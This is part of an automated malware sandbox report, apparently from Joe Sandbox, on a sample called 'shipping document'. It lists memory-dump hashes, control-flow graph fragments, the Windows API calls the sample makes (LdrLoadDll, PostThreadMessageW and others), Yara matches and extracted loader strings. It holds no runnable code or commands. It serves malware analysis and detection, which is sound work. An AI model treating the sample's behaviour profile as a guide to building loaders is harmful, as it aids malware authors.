                                                                                                • Opcode Fuzzy Hash: f61e2b33fa74e696500afba2a418ba6eb2c81a888da694783b1211f47a0cef98
                                                                                                • Instruction Fuzzy Hash: 81C012B145520C9BC750EAB8D5096597FA8D705715F004194E80993500EA726580D665
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f02288fbf156e567419c38978df2cbded80a3f77428e87a0d2f02c52b44584b3
                                                                                                • Instruction ID: b7ae7340c6eaeeb9411640101555b455942d3580ee0e62d7433b4cfa38307331
                                                                                                • Opcode Fuzzy Hash: f02288fbf156e567419c38978df2cbded80a3f77428e87a0d2f02c52b44584b3
                                                                                                • Instruction Fuzzy Hash: 6AB092B52A8100A284046AA4888093A9650EFA2704F40AC252A8640080996299A9A21F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Z/t$RWIK$[[bb
                                                                                                • API String ID: 0-1157992699
                                                                                                • Opcode ID: 905ba5e6b1fe7ad5151a4d5a24c091a8a327a14b2bfbfea9e059ed245ef0ace2
                                                                                                • Instruction ID: fe758d34bcbaec456a1b0e8d5a66752d7c9ed8bd15fa0dab403cf924a2f1b504
                                                                                                • Opcode Fuzzy Hash: 905ba5e6b1fe7ad5151a4d5a24c091a8a327a14b2bfbfea9e059ed245ef0ace2
                                                                                                • Instruction Fuzzy Hash: DF512CB0E1560ACFCB08CFAAC9415AEFFF2EF89301F14D469D415A7254D7349A828F98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 6c15930c49f3f9ed08d4decabdb7484a516a3624072f74039807098535ae2b8b
                                                                                                • Instruction ID: b64ac3e53e6b2f97ee96e83aa8c7605dad7f2acc0081878c49143a63884aa2c9
                                                                                                • Opcode Fuzzy Hash: 6c15930c49f3f9ed08d4decabdb7484a516a3624072f74039807098535ae2b8b
                                                                                                • Instruction Fuzzy Hash: 7321C9B1E016189BEB58CFABD84079EFBF7AFC8300F14C0BAD408A6254DB315A858F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab65efc53916ea49eb3b1e8089db4ec107664acf52d6f815ac119c8454b2a928
                                                                                                • Instruction ID: d1e305982d6492edf546a679d5260492e33eb32787c220794449ead848978f7e
                                                                                                • Opcode Fuzzy Hash: ab65efc53916ea49eb3b1e8089db4ec107664acf52d6f815ac119c8454b2a928
                                                                                                • Instruction Fuzzy Hash: 73A16036E10209CFCF09DFB5C88459EB7B6FF89300B1985AAEC15AB265DB71D946CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1d335103022cde9f0527568303c6590ff5ecbeafe68b55ef7417af48afce58a5
                                                                                                • Instruction ID: 3791ee5014cfec7b17a27dea8a3ffc5382c7aca97e764a4fa4ffeab5f5f68881
                                                                                                • Opcode Fuzzy Hash: 1d335103022cde9f0527568303c6590ff5ecbeafe68b55ef7417af48afce58a5
                                                                                                • Instruction Fuzzy Hash: FBD12935D2061A9ACB04EBA4D9906A9F771FFD5300F60DB9AE44937220EF706ED4CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0042eba7a8c3eb09db87568399439bb9720b9d794e4c9c6af448d8a5c1be5345
                                                                                                • Instruction ID: d508a2cf746cfe0298ab1499427011015076912c6875579ca403a8b5ba9525d7
                                                                                                • Opcode Fuzzy Hash: 0042eba7a8c3eb09db87568399439bb9720b9d794e4c9c6af448d8a5c1be5345
                                                                                                • Instruction Fuzzy Hash: DE81B1B4E15219CFCB44CFAAC58499EBBF1FF89310F149559D819AB321D334AA42CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 59466f83b2be88719072eeefb57bc4e28f0bae4d41903065bd1b711f9cca25b5
                                                                                                • Instruction ID: 9397e0eb827f09c0530d480b2a660a81ebb82083b166b2a8b4c5e8cbf4983b68
                                                                                                • Opcode Fuzzy Hash: 59466f83b2be88719072eeefb57bc4e28f0bae4d41903065bd1b711f9cca25b5
                                                                                                • Instruction Fuzzy Hash: B87127B4E1120A9FCB04CF9AD5819EEFBF1FB89390F108569E811AB354D3359A81CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26946426b1b82ff9cbf80b15d69da6a09db507e4bb2fd7f702488161cbcb3bfc
                                                                                                • Instruction ID: a7f1a8f34eb797a16915a4106810660b2038038d8357fa1e0cc571ea8edbc171
                                                                                                • Opcode Fuzzy Hash: 26946426b1b82ff9cbf80b15d69da6a09db507e4bb2fd7f702488161cbcb3bfc
                                                                                                • Instruction Fuzzy Hash: 5061E2B092570ADBC740DF91E68B259BFB1FFC9300F209495C885A7198DF766BA0CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26c6b622b63e41eac2e17ad9ea42e9ac3dd4f2846f0050a0b5fa28883d0d48f2
                                                                                                • Instruction ID: 269d643694f435981beab52c12653fadc70cbb437b99c35617bfaa6f377b7c3e
                                                                                                • Opcode Fuzzy Hash: 26c6b622b63e41eac2e17ad9ea42e9ac3dd4f2846f0050a0b5fa28883d0d48f2
                                                                                                • Instruction Fuzzy Hash: B861E6B1E1520EDFCB04CFAAC5815AEFFB2BF89300F14945AD825A7244D3359A818F95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d3bfc302ddce0f93cfe7f994ead6f5e19d621d241da82f1dc863cf879e6a5190
                                                                                                • Instruction ID: 4fa3eadfcfc894c35d14619cd2dc35ce5e01d38bf33e242903eec0f308c98b90
                                                                                                • Opcode Fuzzy Hash: d3bfc302ddce0f93cfe7f994ead6f5e19d621d241da82f1dc863cf879e6a5190
                                                                                                • Instruction Fuzzy Hash: 2C5129B0E1631ADBCB04CFAAD5855AEFBF2FB89310F10942AD406A7354D7355A818F94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 00c2efc1cea9f75c5c8ac7fcc2824302fc31d730e3d584ce755d8676bd333ae3
                                                                                                • Instruction ID: 3dcc4c885bec0567388a0ddf72718faceb147e7c587b95214d90e75802191917
                                                                                                • Opcode Fuzzy Hash: 00c2efc1cea9f75c5c8ac7fcc2824302fc31d730e3d584ce755d8676bd333ae3
                                                                                                • Instruction Fuzzy Hash: C04172B1D016588FE71DCF6B8C512DAFBF3AFC5210F19C1BA884CAB215EA3509968F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 65fc4575eed17c6fb0cdb6334e23351b44ce76b84f35a5d4aa0cc3176a73ec87
                                                                                                • Instruction ID: 31252a7545af389b88b9d52bfb04dd9a5ddddb04fb6320362ce4e92127a563f3
                                                                                                • Opcode Fuzzy Hash: 65fc4575eed17c6fb0cdb6334e23351b44ce76b84f35a5d4aa0cc3176a73ec87
                                                                                                • Instruction Fuzzy Hash: 8A4162B1D016188BEB1CCF6B8D4069EFBF3AFC9301F18C1BA881CAA255EB3505958F55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                                                Signature Coverage:7.5%
                                                                                                Total number of Nodes:146
                                                                                                Total number of Limit Nodes:14

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 117 417513-41752f 118 417537-41753c 117->118 119 417532 call 42dd13 117->119 120 417542-417550 call 42e233 118->120 121 41753e-417541 118->121 119->118 124 417560-417571 call 42c6a3 120->124 125 417552-41755d call 42e4d3 120->125 130 417573-417587 LdrLoadDll 124->130 131 41758a-41758d 124->131 125->124 130->131
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 142 42b113-42b14f call 404a63 call 42c1a3 NtClose
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 156 17a2b60-17a2b6c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 38 413ba9-413bac 39 413b5d-413b81 call 4243a3 38->39 40 413bae-413bb9 38->40 48 413ba3-413ba8 39->48 49 413b83-413b94 PostThreadMessageW 39->49 42 413bbb-413bbf 40->42 43 413bc1-413bc6 42->43 44 413bdd-413be3 42->44 43->44 46 413bc8-413bcd 43->46 44->42 47 413be5-413be8 44->47 46->44 50 413bcf-413bd6 46->50 49->48 51 413b96-413ba0 49->51 52 413be9-413bec 50->52 53 413bd8-413bdb 50->53 51->48 53->44 53->52
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 104 41759f-4175a8 105 417569-417571 104->105 106 4175aa-4175ad 104->106 109 417573-417587 LdrLoadDll 105->109 110 41758a-41758d 105->110 107 41754c-417557 106->107 108 4175af-4175d1 106->108 111 41755d-417564 call 42c6a3 107->111 112 417558 call 42e4d3 107->112 109->110 111->105 112->111
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
                                                                                                • Instruction ID: e4ab9689755640822d63fbe6b505d8e1795a9cb8d0c27696370f5954d4754e63
                                                                                                • Opcode Fuzzy Hash: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
                                                                                                • Instruction Fuzzy Hash: 510189B190414DBBDB10CBA9EC81BDF7BB0DF85344F00C6AAE5156B142E234D90ACB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 137 42b473-42b4b4 call 404a63 call 42c1a3 RtlFreeHeap
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8C0F10F9,00000007,00000000,00000004,00000000,00416DF5,000000F4,?,?,?,?,?), ref: 0042B4AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 322447e254e490848a7dc11d9a36ee804f398e5e1aba80f661298ce8981d67c5
                                                                                                • Instruction ID: 09bd555976cb7fe51c9ae1a51c67be1872cc08368b26c9c2cc2b7ddb60dc44c7
                                                                                                • Opcode Fuzzy Hash: 322447e254e490848a7dc11d9a36ee804f398e5e1aba80f661298ce8981d67c5
                                                                                                • Instruction Fuzzy Hash: 5AE06DB62142047FDA10EE59EC81FEB73ACEFC5710F004019F908A7241C670BA108BB8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 132 42b423-42b467 call 404a63 call 42c1a3 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,0041DD4B,?,?,00000000,?,0041DD4B,?,?,?), ref: 0042B462
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 121b79d4969353e6368234b01e7c7ef4be560de81b8639ac67d3c256f8313c30
                                                                                                • Instruction ID: b62c4c16165ce8cc109e7f2f33857a4434384eb5ed26bfb0bfea9a2d7b802c52
                                                                                                • Opcode Fuzzy Hash: 121b79d4969353e6368234b01e7c7ef4be560de81b8639ac67d3c256f8313c30
                                                                                                • Instruction Fuzzy Hash: 33E06DB22002047BDA10EE99DC41FAB73ACEFC9750F00401AF908A7242D670BA118BB9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 147 42b4c3-42b4fc call 404a63 call 42c1a3 ExitProcess
                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(?,00000000,?,?,255E1AAB,?,?,255E1AAB), ref: 0042B4F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: 04604234f2a0b68f427f34f59aba9004207e7b3264d48a7a1756fd21f3996af8
                                                                                                • Instruction ID: 863a66c235e7fd954b78ae36a6c5b66845a375ac7a86da02cded83e73eca7df7
                                                                                                • Opcode Fuzzy Hash: 04604234f2a0b68f427f34f59aba9004207e7b3264d48a7a1756fd21f3996af8
                                                                                                • Instruction Fuzzy Hash: 39E04F752402147BD620EA6ADC41F9BB75CDBC5714F40441AFA1867241C670BA1187E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 152 17a2c0a-17a2c0f 153 17a2c1f-17a2c26 LdrInitializeThunk 152->153 154 17a2c11-17a2c18 152->154
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 7c84f8781c4c939921ad4cf459bb47c90a7d8b324c1f6a4470c392bd7e688057
                                                                                                • Instruction ID: ebf24570c547a57a26ebac8d950c6402a6f82c2dc456a20f8622a1bc7cbdc180
                                                                                                • Opcode Fuzzy Hash: 7c84f8781c4c939921ad4cf459bb47c90a7d8b324c1f6a4470c392bd7e688057
                                                                                                • Instruction Fuzzy Hash: E1B09B719055C5C5DB11E7644A08717B90477D0701F55C171D2030651F4738C1D1E676
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2160512332
                                                                                                • Opcode ID: d75a5674c45220c0ffe02e3ec65813aff759b8ff666ac3c157e44e825267a8e5
                                                                                                • Instruction ID: 356f9e2d915666df62e8e3922176f428c2022355e12a0f4d9115faea1f2d766d
                                                                                                • Opcode Fuzzy Hash: d75a5674c45220c0ffe02e3ec65813aff759b8ff666ac3c157e44e825267a8e5
                                                                                                • Instruction Fuzzy Hash: DF928E71648342AFE721DF28C888B6BF7E9BB88754F04492DFA94D7252D770E844CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 017D5543
                                                                                                • Critical section address, xrefs: 017D5425, 017D54BC, 017D5534
                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D54CE
                                                                                                • undeleted critical section in freed memory, xrefs: 017D542B
                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D54E2
                                                                                                • Critical section debug info address, xrefs: 017D541F, 017D552E
                                                                                                • Invalid debug info address of this critical section, xrefs: 017D54B6
                                                                                                • Thread identifier, xrefs: 017D553A
                                                                                                • double initialized or corrupted critical section, xrefs: 017D5508
                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D540A, 017D5496, 017D5519
                                                                                                • 8, xrefs: 017D52E3
                                                                                                • corrupted critical section, xrefs: 017D54C2
                                                                                                • Critical section address., xrefs: 017D5502
                                                                                                • Address of the debug info found in the active list., xrefs: 017D54AE, 017D54FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                • API String ID: 0-2368682639
                                                                                                • Opcode ID: 67261c1b7db1b05092269308a4979c0efcc37419a238a28810ec970902a50359
                                                                                                • Instruction ID: 1174bd016fbd0129abaa715bd6fed3392b3bd819f0127d604eda07dacbd9a134
                                                                                                • Opcode Fuzzy Hash: 67261c1b7db1b05092269308a4979c0efcc37419a238a28810ec970902a50359
                                                                                                • Instruction Fuzzy Hash: 288187B1A4034CEFDB20CF99C845BAEFBB5EB48B14F204159F905BB241D3B5A944CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017D22E4
                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017D2498
                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017D2409
                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017D24C0
